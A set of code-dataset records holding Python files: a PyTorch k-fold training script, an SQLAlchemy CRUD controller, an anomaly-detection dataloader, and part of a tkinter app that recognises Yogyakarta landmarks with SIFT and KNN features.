+{"seq_id": "627116689", "text": "import argparse\nimport collections\nfrom data_loader.data_loaders import *\nimport models.loss as module_loss\nimport models.metric as module_metric\nimport models.Pearattention.GAT_Pearson as module_arch\nfrom parse_config import ConfigParser\nfrom trainer import Trainer\nfrom utils.util import *\nimport torch\nimport torch.nn as nn\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = False\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\n\ndef main(config, fold_id):\n batch_size = config[\"data_loader\"][\"args\"][\"batch_size\"]\n\n # build model architecture, initialize weights, then print to console\n model = config.init_obj('arch', module_arch)\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_normal_(p)\n print(f'The model has {count_parameters(model):,} trainable parameters')\n\n # get function handles of loss and metrics\n criterion_1 = getattr(module_loss, config['loss_1'])\n criterion_2 = getattr(module_loss, config['loss_2'])\n metrics = [getattr(module_metric, met) for met in config['metrics']]\n\n # build optimizer and trainer\n trainable_params = filter(lambda p: p.requires_grad, model.parameters())\n\n optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n\n data_loader, valid_data_loader, data_count = data_generator_np(folds_data[fold_id][0],\n folds_data[fold_id][1], batch_size)\n weights_for_each_class = calc_class_weight(data_count)\n\n trainer = Trainer(model, criterion_1, criterion_2, metrics, optimizer,\n config=config,\n data_loader=data_loader,\n fold_id=fold_id,\n valid_data_loader=valid_data_loader,\n class_weights=weights_for_each_class)\n\n trainer.training()\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=\"config.json\", type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=\"0\", type=str,\n help='indices of GPUs to enable (default: all)')\n args.add_argument('-f', '--fold_id', type=str,\n help='fold_id')\n args.add_argument('-da', '--np_data_dir', type=str,\n help='Directory containing numpy files')\n\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = []\n\n args2 = args.parse_args()\n fold_id = int(args2.fold_id)\n config = ConfigParser.from_args(args, fold_id, options)\n folds_data = load_folds_data(args2.np_data_dir, config[\"data_loader\"][\"args\"][\"num_folds\"])\n main(config, fold_id)\n\n", "sub_path": "PearNet/train_Kfold_CV.py", "file_name": "train_Kfold_CV.py", "file_ext": "py", "file_size_in_byte": 3065, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "torch.manual_seed", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Pearattention.GAT_Pearson", "line_number": 29, "usage_type": "argument"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "models.loss", "line_number": 36, "usage_type": "argument"}, {"api_name": "models.loss", "line_number": 37, "usage_type": "argument"}, {"api_name": "models.metric", "line_number": 38, "usage_type": "argument"}, {"api_name": "torch.optim", "line_number": 43, "usage_type": "attribute"}, {"api_name": "data_loader.data_loaders", "line_number": 45, "usage_type": "name"}, {"api_name": "trainer.Trainer", "line_number": 49, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 51, "usage_type": "name"}, {"api_name": "trainer.training", "line_number": 56, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 72, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser.from_args", "line_number": 77, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "192177936", "text": "import os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\n\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import or_\nfrom models import Masalah, User, Pegawai, Tindakan\nfrom schemas.tindakan_schema import *\nimport bcrypt, string, random\nimport pathlib as pl\nfrom datetime import datetime, timedelta\n\nTINDAKAN_PATH = r'assets/tindakan/'\n\ndef create_file(foto: UploadFile):\n global TINDAKAN_PATH\n new_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 6))\n file_type = ''.join([r'.',foto.filename.split(r'.')[-1]])\n new_name = new_name.replace(\" \", r'-') + '__' + str(datetime.now().strftime(r'%Y%m%d%H%M%S')) + file_type\n pl.Path(r'{}{}'.format(TINDAKAN_PATH, new_name)).write_bytes(foto.file.read())\n foto.file.close()\n return r'{}{}'.format(TINDAKAN_PATH, new_name)\n\ndef put_file(foto: UploadFile, old_name):\n pl.Path(r'{}'.format(old_name)).unlink()\n return create_file(foto)\n\ndef get_tindakan_by_kondisi(db: Session, deskripsi: str):\n try:\n return db.query(Tindakan).filter(\n Tindakan.kondisi_awal == deskripsi,\n Tindakan.tindakan == deskripsi,\n Tindakan.kondisi_pasca == deskripsi,\n Tindakan.deleted_at == None).first()\n except Exception as e:\n print(e)\n db.rollback()\n return False\n\n\ndef get_tindakan_all(db: Session):\n try:\n return db.query(Tindakan).filter(Tindakan.deleted_at == None).all()\n except Exception as e:\n print('get_all_tindakan',e)\n db.rollback()\n return False\n\n\ndef get_tindakan_by_id(db: Session, id: int):\n try:\n return [True, \"sukses\", db.query(Tindakan).filter(Tindakan.id == id, Tindakan.deleted_at == None).first()]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\n\ndef create_tindakan(db: Session, tindakan: TindakanCreate):\n db_tindakan = Tindakan(kondisi_awal=tindakan.kondisi_awal,\n tindakan=tindakan.tindakan,\n kondisi_pasca=tindakan.kondisi_pasca,\n id_user=tindakan.id_user,\n id_masalah=tindakan.id_masalah,\n id_kategori=tindakan.id_kategori,\n id_ruangan=tindakan.id_ruangan,\n id_sarana=tindakan.id_sarana)\n db_tindakan.foto = create_file(tindakan.foto) if tindakan.foto else None\n try:\n db.add(db_tindakan)\n db.commit()\n db.refresh(db_tindakan)\n return [True, \"sukses\", db_tindakan]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\n\ndef update_tindakan(db: Session, tindakan: TindakanUpdate):\n db_tindakan = db.query(Tindakan).filter(Tindakan.id == tindakan.id, Tindakan.deleted_at == None).first()\n db_tindakan.kondisi_awal = tindakan.kondisi_awal if tindakan.kondisi_awal else db_tindakan.kondisi_awal\n db_tindakan.tindakan = tindakan.tindakan if tindakan.tindakan else db_tindakan.tindakan\n db_tindakan.kondisi_pasca = tindakan.kondisi_pasca if tindakan.kondisi_pasca else db_tindakan.kondisi_pasca\n db_tindakan.id_masalah = tindakan.id_masalah if tindakan.id_masalah else db_tindakan.id_masalah\n db_tindakan.id_ruangan = tindakan.id_ruangan if tindakan.id_ruangan else db_tindakan.id_ruangan\n db_tindakan.id_kategori = tindakan.id_kategori if tindakan.id_kategori else db_tindakan.id_kategori\n db_tindakan.id_sarana = tindakan.id_sarana if tindakan.id_sarana else db_tindakan.id_sarana\n db_tindakan.done_at = datetime.now() if tindakan.status else None\n db_tindakan.foto = put_file(tindakan.foto, db_tindakan.foto) if tindakan.foto else db_tindakan.foto\n try:\n db.commit()\n db.refresh(db_tindakan)\n return [True, \"sukses\", db_tindakan]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\n\ndef delete_tindakan_by_id(db: Session, id: int):\n try:\n db_tindakan = db.query(Tindakan).filter(Tindakan.id == id, Tindakan.deleted_at == None).first()\n if db_tindakan:\n db_tindakan.deleted_at = datetime.now()\n db.commit()\n db.refresh(db_tindakan)\n return [True, \"sukses\", db_tindakan]\n else:\n return [False, \"tindakan sudah dihapus\", []]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\ndef search_tindakan(db: Session, key: str):\n try:\n db_tindakan = db.query(Tindakan).join(Tindakan.ruangan).join(Tindakan.kategori_tindakan\n ).join(Tindakan.sarana).join(Tindakan.masalah).filter(or_(\n Tindakan.kondisi_awal.ilike(r'%{}%'.format(key)),\n Tindakan.tindakan.ilike(r'%{}%'.format(key)),\n Tindakan.kondisi_pasca.ilike(r'%{}%'.format(key)),\n Tindakan.kategori_tindakan.property.mapper.class_.kategori.ilike(r'%{}%'.format(key)),\n Tindakan.sarana.property.mapper.class_.nama.ilike(r'%{}%'.format(key)),\n Tindakan.ruangan.property.mapper.class_.nama.ilike(r'%{}%'.format(key),),\n Tindakan.masalah.property.mapper.class_.deskripsi.ilike(r'%{}%'.format(key)),\n ), Tindakan.deleted_at == None)\n return [True, \"sukses\", db_tindakan.all()]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n", "sub_path": "controllers/tindakan_controller.py", "file_name": "tindakan_controller.py", "file_ext": "py", "file_size_in_byte": 5451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "random.choices", "line_number": 17, "usage_type": "call"}, {"api_name": "string.ascii_uppercase", "line_number": 17, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 17, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 30, "usage_type": "argument"}, {"api_name": "models.Tindakan.kondisi_awal", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Tindakan.tindakan", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Tindakan.kondisi_pasca", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 33, "usage_type": "name"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 43, "usage_type": "argument"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 50, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 52, "usage_type": "argument"}, {"api_name": "models.Tindakan.id", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 80, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 81, "usage_type": "argument"}, {"api_name": "models.Tindakan.id", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 81, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 101, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 103, "usage_type": "argument"}, {"api_name": "models.Tindakan.id", "line_number": 103, "usage_type": "attribute"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 118, "usage_type": "argument"}, {"api_name": "models.Tindakan.ruangan", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Tindakan.kategori_tindakan", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Tindakan.sarana", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 119, "usage_type": "name"}, {"api_name": "models.Tindakan.masalah", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sqlalchemy.or_", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Tindakan.kondisi_awal.ilike", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Tindakan.kondisi_awal", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 120, "usage_type": "name"}, {"api_name": "models.Tindakan.tindakan.ilike", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Tindakan.tindakan", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 121, "usage_type": "name"}, {"api_name": "models.Tindakan.kondisi_pasca.ilike", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Tindakan.kondisi_pasca", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 122, "usage_type": "name"}, {"api_name": "models.Tindakan.kategori_tindakan.property.mapper.class_.kategori.ilike", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Tindakan.kategori_tindakan", "line_number": 123, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 123, "usage_type": "name"}, {"api_name": "models.Tindakan.sarana.property.mapper.class_.nama.ilike", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Tindakan.sarana", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Tindakan.ruangan.property.mapper.class_.nama.ilike", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Tindakan.ruangan", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 125, "usage_type": "name"}, {"api_name": "models.Tindakan.masalah.property.mapper.class_.deskripsi.ilike", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Tindakan.masalah", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 126, "usage_type": "name"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 127, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "185995436", "text": "import torch\nimport pandas as pd\n\n\n# import matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader, SequentialSampler, RandomSampler, TensorDataset\n\n\nservice_ = \"orders\"\nexperiment = \"memory\"\n# experiments_feature_sets = {\"cpu\": [0, 2, 3, 5, 6, 7], \"memory\":[0, 2, 3, 5, 6, 7]}\n\nexperiments_feature_sets = {\"cpu\": [0, 1, 2, 3, 5, 6, 7], \"memory\":[0, 1, 2, 3, 5, 6, 7]}\n\npath_train = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/normal_train.csv\"\npath_validation = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/normal_validation.csv\"\npath_test = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/\" + experiment + \"_test.csv\"\npath_labels = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/\" + experiment + \"_labels.csv\"\n\nbatch_size = 512\n\nfeatures = list(pd.read_csv(path_train).columns[experiments_feature_sets[experiment]])\n# print()\nprint(pd.read_csv(path_validation).columns[experiments_feature_sets[experiment]])\n\ntrain = pd.read_csv(path_train)\n\ntrain = train.values\nvalidation = pd.read_csv(path_validation).values\ntest = pd.read_csv(path_test).values\nlabels = pd.read_csv(path_labels).loc[:, \"target\"]\n\ntrain = train[:, experiments_feature_sets[experiment]]\nvalidation = validation[:, experiments_feature_sets[experiment]]\ntest_ = test[:, experiments_feature_sets[experiment]]\n\ntrain_tensor = TensorDataset(torch.tensor(train, dtype=torch.float32))\ntrain_sampler = RandomSampler(train_tensor)\ntrain_dataloader = DataLoader(train_tensor, sampler=train_sampler, batch_size=batch_size)\n\nvalidation_tensor = TensorDataset(torch.tensor(validation, dtype=torch.float32))\nvalidation_sampler = SequentialSampler(validation_tensor)\nvalidation_dataloader = DataLoader(validation_tensor, sampler=validation_sampler, batch_size=batch_size)\n\n\n\n\nfrom collections import defaultdict\nanom_indecies = defaultdict(list)\nnormal_indecies = []\nkey = 1\ncontrolVar = False\n\n\nfor x in range(test_.shape[0]-2):\n\n if labels.values[x] == 1 and controlVar==False:\n controlVar = True\n\n if labels.values[x] == 1 and controlVar == True:\n anom_indecies[key].append(x)\n else:\n normal_indecies.append(x)\n\n if labels.values[x+1] == 0 and controlVar==True:\n controlVar = False\n key +=1\n\ntest_tensor = TensorDataset(torch.tensor(test_, dtype=torch.float32))\ntest_sampler = SequentialSampler(test_tensor)\ntest_dataloader = DataLoader(test_tensor, sampler=test_sampler, batch_size=batch_size)\n\n\ntest_tensor_1 = TensorDataset(torch.tensor(test_[anom_indecies[1]], dtype=torch.float32))\ntest_sampler_1 = SequentialSampler(test_tensor_1)\ntest_dataloader_1 = DataLoader(test_tensor_1, sampler=test_sampler_1, batch_size=batch_size)\n\n\ntest_tensor_2 = TensorDataset(torch.tensor(test_[anom_indecies[2]], dtype=torch.float32))\ntest_sampler_2 = SequentialSampler(test_tensor_2)\ntest_dataloader_2 = DataLoader(test_tensor_2, sampler=test_sampler_2, batch_size=batch_size)\n\n\ntest_tensor_3 = TensorDataset(torch.tensor(test_[anom_indecies[3]], dtype=torch.float32))\ntest_sampler_3 = SequentialSampler(test_tensor_3)\ntest_dataloader_3 = DataLoader(test_tensor_3, sampler=test_sampler_3, batch_size=batch_size)\n\n\ntest_tensor_4 = TensorDataset(torch.tensor(test_[anom_indecies[4]], dtype=torch.float32))\ntest_sampler_4 = SequentialSampler(test_tensor_4)\ntest_dataloader_4 = DataLoader(test_tensor_4, sampler=test_sampler_4, batch_size=batch_size)\n\n\ntest_tensor_5 = TensorDataset(torch.tensor(test_[anom_indecies[5]], dtype=torch.float32))\ntest_sampler_5 = SequentialSampler(test_tensor_5)\ntest_dataloader_5 = DataLoader(test_tensor_5, sampler=test_sampler_5, batch_size=batch_size)\n\ntest_tensor_6 = TensorDataset(torch.tensor(test_[anom_indecies[6]], dtype=torch.float32))\ntest_sampler_6 = SequentialSampler(test_tensor_6)\ntest_dataloader_6 = DataLoader(test_tensor_6, sampler=test_sampler_6, batch_size=batch_size)\n\ntest_loaders = [test_dataloader_1, test_dataloader_2, test_dataloader_3, test_dataloader_4, test_dataloader_5, test_dataloader_6]\n\n\n\n\n\n\n\n\n\n\n\n# pomaaaa = pd.read_csv(path_test)\n# plt.plot(pomaaaa.loc[:, \"ctn_memory\"])", "sub_path": "4_Analysis/new_scripts/dataloaders.py", "file_name": "dataloaders.py", "file_ext": "py", "file_size_in_byte": 4261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "408915503", "text": "import os\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport webbrowser\r\nimport joblib\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nfrom shutil import copy2\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom xgboost import XGBClassifier\r\nfrom PIL import ImageTk\r\nfrom PIL import Image\r\n\r\n#define root\r\nroot=Tk()\r\nroot.geometry(\"800x300\")\r\nroot.title(\"Skripsi\")\r\n#import model\r\ndata80=pd.read_csv('models/word_220.csv')\r\nwith open('neigh220.pkl', 'rb') as file:\r\n\tneigh = pickle.load(file)\r\nwith open('models/mo,pkl', 'rb') as file:\r\n\tmp = pickle.load(file)\r\n\r\nmaps={'bent':'https://www.google.com/maps/place/Fort+Vredeburg+Museum/@-7.8002713,110.3641111,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a5788c0b3eecf:0xb9611ce0232a9ff8!8m2!3d-7.8002713!4d110.3662998',\r\n'boro':'https://www.google.com/maps/place/Borobudur+Temple/@-7.6078738,110.2015626,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a8cf009a7d697:0xdd34334744dc3cb!8m2!3d-7.6078738!4d110.2037513',\r\n'pinus':'https://www.google.com/maps/place/Hutan+Pinus+Mangunan+Dlingo/@-7.9267837,110.429808,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a536355abb129:0x9fb567811ef62e4e!8m2!3d-7.9267837!4d110.4319967',\r\n'ts': 'https://www.google.com/maps/place/Taman+Sari/@-7.8100812,110.3571798,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a57923d58046b:0x9fbd6cc9617191f4!8m2!3d-7.8100812!4d110.3593685',\r\n'tugu':'https://www.google.com/maps/place/Tugu/@-7.782984,110.3648463,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a591a4d553bd5:0xc0f964003add568b!8m2!3d-7.782984!4d110.367035',\r\n'unk': 'http://google.com/unknown',\r\n}\r\n\r\ndef knning():\r\n\tdico = extract_ciri()\r\n\r\n\tdiki = []\r\n\tfor n in range(len(dico)):\r\n\t\tr = neigh.predict(dico[n].reshape(1, -1))\r\n\t\tdiki.append(r)\r\n\r\n\tdataset = pd.DataFrame(np.zeros([1, 220], dtype=int))\r\n\t\r\n\tbuatkol = []\r\n\tfor i in range(220):\r\n\t\tbuatkol.append('p_' + str(i))\r\n\tdataset.columns = (buatkol)\r\n\r\n\tasain = []\r\n\tfor a in dataset.columns:\r\n\t\tlel = 0\r\n\t\tfor i in diki:\r\n\t\t\tif i == a:\r\n\t\t\t\tlel += 1\r\n\t\tasain.append(lel)\r\n\t\r\n\tdataset = dataset.append(pd.Series(asain, index=dataset.columns), ignore_index=True)\r\n\tlol = dataset.columns\r\n\tpre = pd.DataFrame(dataset.loc[1, lol], index=dataset.columns)\r\n\tpre = pre.transpose()\r\n\thasil = mp.predict(pre)\r\n\tprint(hasil)\r\n\tpro=mp.predict_proba(pre)\r\n\tprob=max(pro[0])\r\n\treturn hasil, prob\r\n\r\ndef extract_ciri():\r\n\tdico = []\r\n\tnem = ('pict.jpg')\r\n\timg = cv2.imread(nem)\r\n\tsift = cv2.xfeatures2d.SIFT_create()\r\n\tkp, des = sift.detectAndCompute(img, None)\r\n\r\n\tfor d in des:\r\n\t\tdico.append(d)\r\n\treturn dico\r\n\t\r\n#print(lis)\r\n\r\ndef doNothing():\r\n\tglobal lis, prob\r\n\tlis, prob = knning()\r\n\tprint(lis)\r\n\tif lis=='boro':\r\n\t\thasil=\"Borobudur,\"\r\n\t\thaha=\"terletak di kawasan Magelang, sekitar 40 km dari kota Yogyakarta. \\nBorobudur adalah candi atau kuil Buddha terbesar di dunia, sekaligus salah satu \\nmonumen Buddha terbesar di dunia. Monumen ini terdiri atas enam teras berbentuk \\nbujur sangkar yang di atasnya terdapat tiga pelataran melingkar, pada dindingnya \\ndihiasi dengan 2.672 panel relief dan aslinya terdapat 504 arca Buddha. (sumber: Wikipedia)\"\r\n\telif lis=='pinus':\r\n\t\thasil='Hutan Pinus Mangunan'\r\n\t\thaha=\"secara administrasi terletak di Desa Sudimoro, Kelurahan Muntuk, \\nKecamatan Dlingo, Kabupaten Bantul, Provinsi Daerah Istimewa Yogyakarta.\\nDahulunya kawasan ini merupakan kawasan tanah kering dan berkapur yang tingkat kesuburannya rendah. \\nKemudian oleh pemerintah melalui Perhutani wilayah ini dijadikan sebagai \\nResort Pengelolaan Hutan (RPH) dengan program utamanya yaitu melakukan reboisasi.(sumber: Siswapedia)\"\r\n\telif lis=='ts':\r\n\t\thasil='Taman Sari'\r\n\t\thaha=\"adalah situs bekas taman atau kebun istana Keraton Ngayogyakarta. \\nKebun ini dibangun pada zaman Sultan Hamengku Buwono I (HB I) pada tahun 1758-1765/9. \\nAwalnya, taman yang mendapat sebutan The Fragrant Garden ini memiliki \\nluas lebih dari 10 hektare dengan sekitar 57 bangunan baik berupa gedung, kolam pemandian, \\njembatan gantung, kanal air, maupun danau buatan beserta pulau buatan dan lorong bawah air. \\nKebun yang digunakan secara efektif antara 1765-1812 ini pada mulanya membentang dari \\nbarat daya kompleks Kedhaton sampai tenggara kompleks Magangan.(sumber: Wikipedia)\"\r\n\telif lis=='tugu':\r\n\t\thasil='Tugu Yogyakarta'\r\n\t\thaha=\"adalah sebuah tugu atau monumen yang sering dipakai sebagai simbol \\natau lambang dari kota Yogyakarta. Tugu ini dibangun oleh pemerintah Belanda setelah \\ntugu sebelumnya runtuh akibat gempa yang terjadi waktu itu. \\nTugu sebelumnya yang bernama Tugu Golong-Gilig dibangun oleh Hamengkubuwana I. \\nTugu yang terletak di perempatan Jalan Jenderal Sudirman dan Jalan Margo Utomo ini, \\nmempunyai nilai simbolis dan merupakan garis yang bersifat magis menghubungkan laut selatan, \\nkraton Jogja dan gunung Merapi. Pada saat melakukan meditasi, konon Sultan Yogyakarta pada waktu itu \\nmenggunakan tugu ini sebagai patokan arah menghadap puncak gunung Merapi.(sumber: Wikipedia)\"\r\n\telif lis=='unk':\r\n\t\thasil='UNKNOWN'\r\n\t\thaha='Mohon 